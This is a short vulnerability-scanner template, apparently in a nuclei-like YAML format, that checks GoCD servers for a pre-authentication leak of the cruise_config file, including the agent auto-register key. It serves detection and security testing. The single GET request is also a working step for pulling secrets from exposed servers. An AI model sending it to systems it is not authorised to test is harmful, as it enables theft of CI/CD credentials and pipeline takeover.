id: gocd-secret-leak
info:
  name: GoCD Secret Leak
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/go/add-on/business-continuity/api/cruise_config
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "artifactsDir") && StringSearch("response", "agentAutoRegisterKey")

references:
  - links: 
      - https://attackerkb.com/topics/ShpnUFlqDz/pre-auth-takeover-of-build-pipelines-in-gocd
      - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover